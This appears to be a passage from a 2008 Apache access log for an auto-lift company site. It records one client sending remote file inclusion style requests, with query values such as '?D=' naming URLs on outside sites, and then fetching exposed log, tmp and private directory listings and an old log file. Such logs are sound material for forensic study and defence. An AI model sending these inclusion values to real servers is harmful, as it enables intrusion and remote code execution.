213.211.129.186 - - [17/Jun/2008:14:36:58 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:36:59 -0700] "GET /?D=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:36:59 -0700] "GET /?D=http%3A%2F%2Fwww.cusianagas.com%2Fadministrador%2Fciw%2Fasezu%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:36:59 -0700] "GET /?D=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Fedexuq%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:36:59 -0700] "GET /?M=http%3A%2F%2Fwww.boomerbible.com%2Finstapunk%2FMType%2Farchives%2Fajuq%2Favu%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:00 -0700] "GET /?M=http%3A%2F%2Fwww.service-exposants.com%2Fstore%2Fiyi%2Fzobakiq%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:00 -0700] "GET /?M=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:00 -0700] "GET /?S=http%3A%2F%2Fwww.landisempach-emmen.ch%2Faktionen%2Fimage%2Fezu%2Fseq%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:00 -0700] "GET /?S=http%3A%2F%2Fwww.oriolmanya.net%2Fnautilus%2FphpBB2%2Flanguage%2Flang_english%2Fifekeri%2Fcekogah%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:01 -0700] "GET /?S=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Fedexuq%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:01 -0700] "GET /?N=http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fmumas%2Fsuvoye%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:01 -0700] "GET /?N=http%3A%2F%2Fwww.interkonet.com%2Fgaleria%2Fmodules%2Falbumselect%2Fucu%2Fyixipuz%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:01 -0700] "GET /?N=http%3A%2F%2Fwww.winbd.net%2Fadmin%2Fjist_code%2Fwowoz%2Fobowupu%2F HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:02 -0700] "GET /?D=A HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:02 -0700] "GET /logs/ HTTP/1.0" 200 2358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:02 -0700] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:02 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:02 -0700] "GET /_private/ HTTP/1.0" 200 514 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:03 -0700] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:03 -0700] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:03 -0700] "GET /?N=A HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:03 -0700] "GET /?D=D HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:04 -0700] "GET /logs/access_070731.log HTTP/1.0" 200 338648 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:05 -0700] "GET /logs/?M=A HTTP/1.0" 200 2358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:05 -0700] "GET /?M=D HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:05 -0700] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:05 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:05 -0700] "GET /_private/?S=A HTTP/1.0" 200 514 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:06 -0700] "GET /_private/?M=A HTTP/1.0" 200 514 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:06 -0700] "GET /?S=D HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:06 -0700] "GET /logs/?N=A HTTP/1.0" 200 2358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:06 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:07 -0700] "GET /_private/?S=D HTTP/1.0" 200 514 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
213.211.129.186 - - [17/Jun/2008:14:37:07 -0700] "GET /_private/?M=D HTTP/1.0" 200 514 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)" "www.autobutlerlifts.com"
74.6.17.156 - - [17/Jun/2008:14:46:40 -0700] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.autobutlerlifts.com" 89.